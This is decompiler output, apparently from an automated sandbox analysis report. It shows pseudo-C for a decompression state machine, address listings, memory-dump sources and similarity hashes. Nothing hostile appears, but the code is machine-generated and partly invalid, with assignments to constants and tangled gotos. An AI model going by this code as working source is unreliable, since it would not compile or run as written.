                                                                                                                        													_t400 = __ebp - 0x60;
                                                                                                                        													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                        													__eflags =  *_t400;
                                                                                                                        													goto L123;
                                                                                                                        												}
                                                                                                                        												__ecx = __ebx;
                                                                                                                        												__eax = __ebx;
                                                                                                                        												__ecx = __ebx >> 1;
                                                                                                                        												__eax = __ebx & 0x00000001;
                                                                                                                        												__ecx = (__ebx >> 1) - 1;
                                                                                                                        												__al = __al | 0x00000002;
                                                                                                                        												__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                        												__eflags = __ebx - 0xe;
                                                                                                                        												 *(__ebp - 0x2c) = __eax;
                                                                                                                        												if(__ebx >= 0xe) {
                                                                                                                        													__ebx = 0;
                                                                                                                        													 *(__ebp - 0x48) = __ecx;
                                                                                                                        													L102:
                                                                                                                        													__eflags =  *(__ebp - 0x48);
                                                                                                                        													if( *(__ebp - 0x48) <= 0) {
                                                                                                                        														__eax = __eax + __ebx;
                                                                                                                        														 *(__ebp - 0x40) = 4;
                                                                                                                        														 *(__ebp - 0x2c) = __eax;
                                                                                                                        														__eax =  *(__ebp - 4);
                                                                                                                        														__eax =  *(__ebp - 4) + 0x644;
                                                                                                                        														__eflags = __eax;
                                                                                                                        														L108:
                                                                                                                        														__ebx = 0;
                                                                                                                        														 *(__ebp - 0x58) = __eax;
                                                                                                                        														 *(__ebp - 0x50) = 1;
                                                                                                                        														 *(__ebp - 0x44) = 0;
                                                                                                                        														 *(__ebp - 0x48) = 0;
                                                                                                                        														L112:
                                                                                                                        														__eax =  *(__ebp - 0x40);
                                                                                                                        														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                        														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                        															_t391 = __ebp - 0x2c;
                                                                                                                        															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                        															__eflags =  *_t391;
                                                                                                                        															goto L119;
                                                                                                                        														}
                                                                                                                        														__eax =  *(__ebp - 0x50);
                                                                                                                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                        														__eax =  *(__ebp - 0x58);
                                                                                                                        														__esi = __edi + __eax;
                                                                                                                        														 *(__ebp - 0x54) = __esi;
                                                                                                                        														__ax =  *__esi;
                                                                                                                        														__ecx = __ax & 0x0000ffff;
                                                                                                                        														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                        														__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                        														if( *(__ebp - 0xc) >= __edx) {
                                                                                                                        															__ecx = 0;
                                                                                                                        															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                        															__ecx = 1;
                                                                                                                        															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                        															__ebx = 1;
                                                                                                                        															__ecx =  *(__ebp - 0x48);
                                                                                                                        															__ebx = 1 << __cl;
                                                                                                                        															__ecx = 1 << __cl;
                                                                                                                        															__ebx =  *(__ebp - 0x44);
                                                                                                                        															__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                        															__cx = __ax;
                                                                                                                        															__cx = __ax >> 5;
                                                                                                                        															__eax = __eax - __ecx;
                                                                                                                        															__edi = __edi + 1;
                                                                                                                        															__eflags = __edi;
                                                                                                                        															 *(__ebp - 0x44) = __ebx;
                                                                                                                        															 *__esi = __ax;
                                                                                                                        															 *(__ebp - 0x50) = __edi;
                                                                                                                        														} else {
                                                                                                                        															 *(__ebp - 0x10) = __edx;
                                                                                                                        															0x800 = 0x800 - __ecx;
                                                                                                                        															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                        															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                        															 *__esi = __dx;
                                                                                                                        														}
                                                                                                                        														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        														if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        															L111:
                                                                                                                        															_t368 = __ebp - 0x48;
                                                                                                                        															 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                        															__eflags =  *_t368;
                                                                                                                        															goto L112;
                                                                                                                        														} else {
                                                                                                                        															goto L109;
                                                                                                                        														}
                                                                                                                        													}
                                                                                                                        													__ecx =  *(__ebp - 0xc);
                                                                                                                        													__ebx = __ebx + __ebx;
                                                                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                        													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                        													 *(__ebp - 0x44) = __ebx;
                                                                                                                        													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                        														__ecx =  *(__ebp - 0x10);
                                                                                                                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                        														__ebx = __ebx | 0x00000001;
                                                                                                                        														__eflags = __ebx;
                                                                                                                        														 *(__ebp - 0x44) = __ebx;
                                                                                                                        													}
                                                                                                                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        														L101:
                                                                                                                        														_t338 = __ebp - 0x48;
                                                                                                                        														 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                        														__eflags =  *_t338;
                                                                                                                        														goto L102;
                                                                                                                        													} else {
                                                                                                                        														goto L99;
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												__edx =  *(__ebp - 4);
                                                                                                                        												__eax = __eax - __ebx;
                                                                                                                        												 *(__ebp - 0x40) = __ecx;
                                                                                                                        												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                        												goto L108;
                                                                                                                        											case 0x1a:
                                                                                                                        												L56:
                                                                                                                        												__eflags =  *(__ebp - 0x64);
                                                                                                                        												if( *(__ebp - 0x64) == 0) {
                                                                                                                        													 *(__ebp - 0x88) = 0x1a;
                                                                                                                        													goto L170;
                                                                                                                        												}
                                                                                                                        												__ecx =  *(__ebp - 0x68);
                                                                                                                        												__al =  *(__ebp - 0x5c);
                                                                                                                        												__edx =  *(__ebp - 8);
                                                                                                                        												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                        												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                        												 *( *(__ebp - 0x68)) = __al;
                                                                                                                        												__ecx =  *(__ebp - 0x14);
                                                                                                                        												 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                        												__eax = __ecx + 1;
                                                                                                                        												__edx = 0;
                                                                                                                        												_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                        												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                        												__edx = _t192;
                                                                                                                        												goto L80;
                                                                                                                        											case 0x1b:
                                                                                                                        												L76:
                                                                                                                        												__eflags =  *(__ebp - 0x64);
                                                                                                                        												if( *(__ebp - 0x64) == 0) {
                                                                                                                        													 *(__ebp - 0x88) = 0x1b;
                                                                                                                        													goto L170;
                                                                                                                        												}
                                                                                                                        												__eax =  *(__ebp - 0x14);
                                                                                                                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                        												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                        												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                        													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                        													__eflags = __eax;
                                                                                                                        												}
                                                                                                                        												__edx =  *(__ebp - 8);
                                                                                                                        												__cl =  *(__eax + __edx);
                                                                                                                        												__eax =  *(__ebp - 0x14);
                                                                                                                        												 *(__ebp - 0x5c) = __cl;
                                                                                                                        												 *(__eax + __edx) = __cl;
                                                                                                                        												__eax = __eax + 1;
                                                                                                                        												__edx = 0;
                                                                                                                        												_t275 = __eax %  *(__ebp - 0x74);
                                                                                                                        												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                        												__edx = _t275;
                                                                                                                        												__eax =  *(__ebp - 0x68);
                                                                                                                        												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                        												_t284 = __ebp - 0x64;
                                                                                                                        												 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                                                        												__eflags =  *_t284;
                                                                                                                        												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                        												L80:
                                                                                                                        												 *(__ebp - 0x14) = __edx;
                                                                                                                        												goto L81;
                                                                                                                        											case 0x1c:
                                                                                                                        												while(1) {
                                                                                                                        													L123:
                                                                                                                        													__eflags =  *(__ebp - 0x64);
                                                                                                                        													if( *(__ebp - 0x64) == 0) {
                                                                                                                        														break;
                                                                                                                        													}
                                                                                                                        													__eax =  *(__ebp - 0x14);
                                                                                                                        													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                        													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                        													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                        														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                        														__eflags = __eax;
                                                                                                                        													}
                                                                                                                        													__edx =  *(__ebp - 8);
                                                                                                                        													__cl =  *(__eax + __edx);
                                                                                                                        													__eax =  *(__ebp - 0x14);
                                                                                                                        													 *(__ebp - 0x5c) = __cl;
                                                                                                                        													 *(__eax + __edx) = __cl;
                                                                                                                        													__eax = __eax + 1;
                                                                                                                        													__edx = 0;
                                                                                                                        													_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                        													__eax = __eax /  *(__ebp - 0x74);
                                                                                                                        													__edx = _t414;
                                                                                                                        													__eax =  *(__ebp - 0x68);
                                                                                                                        													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                        													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                        													__eflags =  *(__ebp - 0x30);
                                                                                                                        													 *( *(__ebp - 0x68)) = __cl;
                                                                                                                        													 *(__ebp - 0x14) = _t414;
                                                                                                                        													if( *(__ebp - 0x30) > 0) {
                                                                                                                        														continue;
                                                                                                                        													} else {
                                                                                                                        														L81:
                                                                                                                        														 *(__ebp - 0x88) = 2;
                                                                                                                        														goto L1;
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												 *(__ebp - 0x88) = 0x1c;
                                                                                                                        												goto L170;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        									L171:
                                                                                                                        									_t535 = _t534 | 0xffffffff;
                                                                                                                        									goto L172;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					goto L1;
                                                                                                                        				}
                                                                                                                        			}













                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040605a
                                                                                                                        0x0040605a
                                                                                                                        0x0040605d
                                                                                                                        0x0040605e
                                                                                                                        0x0040605e
                                                                                                                        0x00000000
                                                                                                                        0x0040605a
                                                                                                                        0x00406034
                                                                                                                        0x00406039
                                                                                                                        0x00406039
                                                                                                                        0x00406042
                                                                                                                        0x0040604a
                                                                                                                        0x0040604d
                                                                                                                        0x00000000
                                                                                                                        0x00406053
                                                                                                                        0x00406053
                                                                                                                        0x00000000
                                                                                                                        0x00406053
                                                                                                                        0x00000000
                                                                                                                        0x00406070
                                                                                                                        0x00406070
                                                                                                                        0x00406074
                                                                                                                        0x00406920
                                                                                                                        0x00000000
                                                                                                                        0x00406920
                                                                                                                        0x0040607d
                                                                                                                        0x0040608d
                                                                                                                        0x00406090
                                                                                                                        0x00406093
                                                                                                                        0x00406093
                                                                                                                        0x00406093
                                                                                                                        0x00406096
                                                                                                                        0x0040609a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040609c
                                                                                                                        0x004060a2
                                                                                                                        0x004060cc
                                                                                                                        0x004060d2
                                                                                                                        0x004060d9
                                                                                                                        0x00000000
                                                                                                                        0x004060d9
                                                                                                                        0x004060a8
                                                                                                                        0x004060ab
                                                                                                                        0x004060b0
                                                                                                                        0x004060b0
                                                                                                                        0x004060bb
                                                                                                                        0x004060c3
                                                                                                                        0x004060c6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040610b
                                                                                                                        0x00406111
                                                                                                                        0x00406114
                                                                                                                        0x00406121
                                                                                                                        0x00406129
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004060e0
                                                                                                                        0x004060e0
                                                                                                                        0x004060e4
                                                                                                                        0x0040692f
                                                                                                                        0x00000000
                                                                                                                        0x0040692f
                                                                                                                        0x004060f0
                                                                                                                        0x004060fb
                                                                                                                        0x004060fb
                                                                                                                        0x004060fb
                                                                                                                        0x004060fe
                                                                                                                        0x00406101
                                                                                                                        0x00406104
                                                                                                                        0x00406109
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004067a0
                                                                                                                        0x004067a0
                                                                                                                        0x004067a6
                                                                                                                        0x004067ac
                                                                                                                        0x004067b2
                                                                                                                        0x004067cc
                                                                                                                        0x004067cf
                                                                                                                        0x004067d5
                                                                                                                        0x004067e0
                                                                                                                        0x004067e2
                                                                                                                        0x004067b4
                                                                                                                        0x004067b4
                                                                                                                        0x004067c3
                                                                                                                        0x004067c7
                                                                                                                        0x004067c7
                                                                                                                        0x004067ec
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406131
                                                                                                                        0x00406133
                                                                                                                        0x00406136
                                                                                                                        0x004061a7
                                                                                                                        0x004061aa
                                                                                                                        0x004061ad
                                                                                                                        0x004061b4
                                                                                                                        0x004061be
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x00000000
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x00406138
                                                                                                                        0x0040613c
                                                                                                                        0x0040613f
                                                                                                                        0x00406141
                                                                                                                        0x00406144
                                                                                                                        0x00406147
                                                                                                                        0x00406149
                                                                                                                        0x0040614c
                                                                                                                        0x0040614e
                                                                                                                        0x00406153
                                                                                                                        0x00406156
                                                                                                                        0x00406159
                                                                                                                        0x0040615d
                                                                                                                        0x00406164
                                                                                                                        0x00406167
                                                                                                                        0x0040616e
                                                                                                                        0x00406172
                                                                                                                        0x0040617a
                                                                                                                        0x0040617a
                                                                                                                        0x0040617a
                                                                                                                        0x00406174
                                                                                                                        0x00406174
                                                                                                                        0x00406174
                                                                                                                        0x00406169
                                                                                                                        0x00406169
                                                                                                                        0x00406169
                                                                                                                        0x0040617e
                                                                                                                        0x00406181
                                                                                                                        0x0040619f
                                                                                                                        0x004061a1
                                                                                                                        0x00000000
                                                                                                                        0x00406183
                                                                                                                        0x00406183
                                                                                                                        0x00406186
                                                                                                                        0x00406189
                                                                                                                        0x0040618c
                                                                                                                        0x0040618e
                                                                                                                        0x0040618e
                                                                                                                        0x0040618e
                                                                                                                        0x00406191
                                                                                                                        0x00406194
                                                                                                                        0x00406196
                                                                                                                        0x00406197
                                                                                                                        0x0040619a
                                                                                                                        0x00000000
                                                                                                                        0x0040619a
                                                                                                                        0x00000000
                                                                                                                        0x004063d0
                                                                                                                        0x004063d4
                                                                                                                        0x004063f2
                                                                                                                        0x004063f5
                                                                                                                        0x004063fc
                                                                                                                        0x004063ff
                                                                                                                        0x00406402
                                                                                                                        0x00406405
                                                                                                                        0x00406408
                                                                                                                        0x0040640b
                                                                                                                        0x0040640d
                                                                                                                        0x00406414
                                                                                                                        0x00406415
                                                                                                                        0x00406417
                                                                                                                        0x0040641a
                                                                                                                        0x0040641d
                                                                                                                        0x00406420
                                                                                                                        0x00406420
                                                                                                                        0x00406425
                                                                                                                        0x00000000
                                                                                                                        0x00406425
                                                                                                                        0x004063d6
                                                                                                                        0x004063d9
                                                                                                                        0x004063dc
                                                                                                                        0x004063e6
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x00000000
                                                                                                                        0x0040679d
                                                                                                                        0x00000000
                                                                                                                        0x0040643a
                                                                                                                        0x0040643e
                                                                                                                        0x00406461
                                                                                                                        0x00406464
                                                                                                                        0x00406467
                                                                                                                        0x00406471
                                                                                                                        0x00406440
                                                                                                                        0x00406440
                                                                                                                        0x00406443
                                                                                                                        0x00406446
                                                                                                                        0x00406449
                                                                                                                        0x00406456
                                                                                                                        0x00406459
                                                                                                                        0x00406459
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406824
                                                                                                                        0x00406828
                                                                                                                        0x00406846
                                                                                                                        0x00406846
                                                                                                                        0x00406846
                                                                                                                        0x0040684d
                                                                                                                        0x00406854
                                                                                                                        0x0040685b
                                                                                                                        0x0040685b
                                                                                                                        0x00000000
                                                                                                                        0x0040685b
                                                                                                                        0x0040682a
                                                                                                                        0x0040682d
                                                                                                                        0x00406830
                                                                                                                        0x00406833
                                                                                                                        0x0040683a
                                                                                                                        0x0040677e
                                                                                                                        0x0040677e
                                                                                                                        0x00406781
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406915
                                                                                                                        0x00406918
                                                                                                                        0x00406819
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040654f
                                                                                                                        0x00406551
                                                                                                                        0x00406558
                                                                                                                        0x00406559
                                                                                                                        0x0040655b
                                                                                                                        0x0040655e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406566
                                                                                                                        0x00406569
                                                                                                                        0x0040656c
                                                                                                                        0x0040656e
                                                                                                                        0x00406570
                                                                                                                        0x00406570
                                                                                                                        0x00406571
                                                                                                                        0x00406574
                                                                                                                        0x0040657b
                                                                                                                        0x0040657e
                                                                                                                        0x0040658c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406862
                                                                                                                        0x00406862
                                                                                                                        0x00406865
                                                                                                                        0x0040686c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406871
                                                                                                                        0x00406871
                                                                                                                        0x00406875
                                                                                                                        0x004069ad
                                                                                                                        0x00000000
                                                                                                                        0x004069ad
                                                                                                                        0x0040687b
                                                                                                                        0x0040687e
                                                                                                                        0x00406881
                                                                                                                        0x00406885
                                                                                                                        0x00406888
                                                                                                                        0x0040688e
                                                                                                                        0x00406890
                                                                                                                        0x00406890
                                                                                                                        0x00406890
                                                                                                                        0x00406893
                                                                                                                        0x00406896
                                                                                                                        0x00406896
                                                                                                                        0x00406896
                                                                                                                        0x00406896
                                                                                                                        0x00406899
                                                                                                                        0x00406899
                                                                                                                        0x0040689d
                                                                                                                        0x004068fd
                                                                                                                        0x00406900
                                                                                                                        0x00406905
                                                                                                                        0x00406906
                                                                                                                        0x00406908
                                                                                                                        0x0040690a
                                                                                                                        0x0040690d
                                                                                                                        0x00406819
                                                                                                                        0x00406819
                                                                                                                        0x00000000
                                                                                                                        0x0040681f
                                                                                                                        0x00406819
                                                                                                                        0x0040689f
                                                                                                                        0x004068a5
                                                                                                                        0x004068a8
                                                                                                                        0x004068ab
                                                                                                                        0x004068ae
                                                                                                                        0x004068b1
                                                                                                                        0x004068b4
                                                                                                                        0x004068b7
                                                                                                                        0x004068ba
                                                                                                                        0x004068bd
                                                                                                                        0x004068c0
                                                                                                                        0x004068d9
                                                                                                                        0x004068dc
                                                                                                                        0x004068df
                                                                                                                        0x004068e2
                                                                                                                        0x004068e6
                                                                                                                        0x004068e8
                                                                                                                        0x004068e8
                                                                                                                        0x004068e9
                                                                                                                        0x004068ec
                                                                                                                        0x004068c2
                                                                                                                        0x004068c2
                                                                                                                        0x004068ca
                                                                                                                        0x004068cf
                                                                                                                        0x004068d1
                                                                                                                        0x004068d4
                                                                                                                        0x004068d4
                                                                                                                        0x004068ef
                                                                                                                        0x004068f6
                                                                                                                        0x00000000
                                                                                                                        0x004068f8
                                                                                                                        0x00000000
                                                                                                                        0x004068f8
                                                                                                                        0x00000000
                                                                                                                        0x00406594
                                                                                                                        0x00406597
                                                                                                                        0x004065cd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x00406700
                                                                                                                        0x00406700
                                                                                                                        0x00406703
                                                                                                                        0x00406705
                                                                                                                        0x0040698f
                                                                                                                        0x00000000
                                                                                                                        0x0040698f
                                                                                                                        0x0040670b
                                                                                                                        0x0040670e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406714
                                                                                                                        0x00406718
                                                                                                                        0x0040671b
                                                                                                                        0x0040671b
                                                                                                                        0x0040671b
                                                                                                                        0x00000000
                                                                                                                        0x0040671b
                                                                                                                        0x00406599
                                                                                                                        0x0040659b
                                                                                                                        0x0040659d
                                                                                                                        0x0040659f
                                                                                                                        0x004065a2
                                                                                                                        0x004065a3
                                                                                                                        0x004065a5
                                                                                                                        0x004065a7
                                                                                                                        0x004065aa
                                                                                                                        0x004065ad
                                                                                                                        0x004065c3
                                                                                                                        0x004065c8
                                                                                                                        0x00406600
                                                                                                                        0x00406600
                                                                                                                        0x00406604
                                                                                                                        0x00406630
                                                                                                                        0x00406632
                                                                                                                        0x00406639
                                                                                                                        0x0040663c
                                                                                                                        0x0040663f
                                                                                                                        0x0040663f
                                                                                                                        0x00406644
                                                                                                                        0x00406644
                                                                                                                        0x00406646
                                                                                                                        0x00406649
                                                                                                                        0x00406650
                                                                                                                        0x00406653
                                                                                                                        0x00406680
                                                                                                                        0x00406680
                                                                                                                        0x00406683
                                                                                                                        0x00406686
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x00000000
                                                                                                                        0x004066fa
                                                                                                                        0x00406688
                                                                                                                        0x0040668e
                                                                                                                        0x00406691
                                                                                                                        0x00406694
                                                                                                                        0x00406697
                                                                                                                        0x0040669a
                                                                                                                        0x0040669d
                                                                                                                        0x004066a0
                                                                                                                        0x004066a3
                                                                                                                        0x004066a6
                                                                                                                        0x004066a9
                                                                                                                        0x004066c2
                                                                                                                        0x004066c4
                                                                                                                        0x004066c7
                                                                                                                        0x004066c8
                                                                                                                        0x004066cb
                                                                                                                        0x004066cd
                                                                                                                        0x004066d0
                                                                                                                        0x004066d2
                                                                                                                        0x004066d4
                                                                                                                        0x004066d7
                                                                                                                        0x004066d9
                                                                                                                        0x004066dc
                                                                                                                        0x004066e0
                                                                                                                        0x004066e2
                                                                                                                        0x004066e2
                                                                                                                        0x004066e3
                                                                                                                        0x004066e6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 55b1e8378e3b2d282ecc9e99db2cbf184c75cfe722202a43e2005f386b139382
                                                                                                                        • Instruction ID: 067b91939e33353516387f96afd3df60e22fb0a2a23546be1218d687de4ca84d
                                                                                                                        • Opcode Fuzzy Hash: 55b1e8378e3b2d282ecc9e99db2cbf184c75cfe722202a43e2005f386b139382
                                                                                                                        • Instruction Fuzzy Hash: 14715371E00229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7799996DF54
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E0040643A() {
                                                                                                                        				unsigned short _t531;
                                                                                                                        				signed int _t532;
                                                                                                                        				void _t533;
                                                                                                                        				signed int _t534;
                                                                                                                        				signed int _t535;
                                                                                                                        				signed int _t565;
                                                                                                                        				signed int _t568;
                                                                                                                        				signed int _t589;
                                                                                                                        				signed int* _t606;
                                                                                                                        				void* _t613;
                                                                                                                        
                                                                                                                        				L0:
                                                                                                                        				while(1) {
                                                                                                                        					L0:
                                                                                                                        					if( *(_t613 - 0x40) != 0) {
                                                                                                                        						 *(_t613 - 0x84) = 0xa;
                                                                                                                        						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                                                                                        					} else {
                                                                                                                        						 *(__ebp - 0x84) = 9;
                                                                                                                        						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                        					}
                                                                                                                        					while(1) {
                                                                                                                        						 *(_t613 - 0x54) = _t606;
                                                                                                                        						while(1) {
                                                                                                                        							L133:
                                                                                                                        							_t531 =  *_t606;
                                                                                                                        							_t589 = _t531 & 0x0000ffff;
                                                                                                                        							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                        							if( *(_t613 - 0xc) >= _t565) {
                                                                                                                        								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                        								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                        								 *(_t613 - 0x40) = 1;
                                                                                                                        								_t532 = _t531 - (_t531 >> 5);
                                                                                                                        								 *_t606 = _t532;
                                                                                                                        							} else {
                                                                                                                        								 *(_t613 - 0x10) = _t565;
                                                                                                                        								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                        								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                        							}
                                                                                                                        							if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                        								goto L139;
                                                                                                                        							}
                                                                                                                        							L137:
                                                                                                                        							if( *(_t613 - 0x6c) == 0) {
                                                                                                                        								 *(_t613 - 0x88) = 5;
                                                                                                                        								L170:
                                                                                                                        								_t568 = 0x22;
                                                                                                                        								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                        								_t535 = 0;
                                                                                                                        								L172:
                                                                                                                        								return _t535;
                                                                                                                        							}
                                                                                                                        							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                        							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                        							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                        							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                        							L139:
                                                                                                                        							_t533 =  *(_t613 - 0x84);
                                                                                                                        							while(1) {
                                                                                                                        								 *(_t613 - 0x88) = _t533;
                                                                                                                        								while(1) {
                                                                                                                        									L1:
                                                                                                                        									_t534 =  *(_t613 - 0x88);
                                                                                                                        									if(_t534 > 0x1c) {
                                                                                                                        										break;
                                                                                                                        									}
                                                                                                                        									switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
                                                                                                                        										case 0:
                                                                                                                        											if( *(_t613 - 0x6c) == 0) {
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                        											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                        											_t534 =  *( *(_t613 - 0x70));
                                                                                                                        											if(_t534 > 0xe1) {
                                                                                                                        												goto L171;
                                                                                                                        											}
                                                                                                                        											_t538 = _t534 & 0x000000ff;
                                                                                                                        											_push(0x2d);
                                                                                                                        											asm("cdq");
                                                                                                                        											_pop(_t570);
                                                                                                                        											_push(9);
                                                                                                                        											_pop(_t571);
                                                                                                                        											_t609 = _t538 / _t570;
                                                                                                                        											_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                        											asm("cdq");
                                                                                                                        											_t604 = _t540 % _t571 & 0x000000ff;
                                                                                                                        											 *(_t613 - 0x3c) = _t604;
                                                                                                                        											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                        											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                        											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                        											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                        												L10:
                                                                                                                        												if(_t612 == 0) {
                                                                                                                        													L12:
                                                                                                                        													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                        													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                        													goto L15;
                                                                                                                        												} else {
                                                                                                                        													goto L11;
                                                                                                                        												}
                                                                                                                        												do {
                                                                                                                        													L11:
                                                                                                                        													_t612 = _t612 - 1;
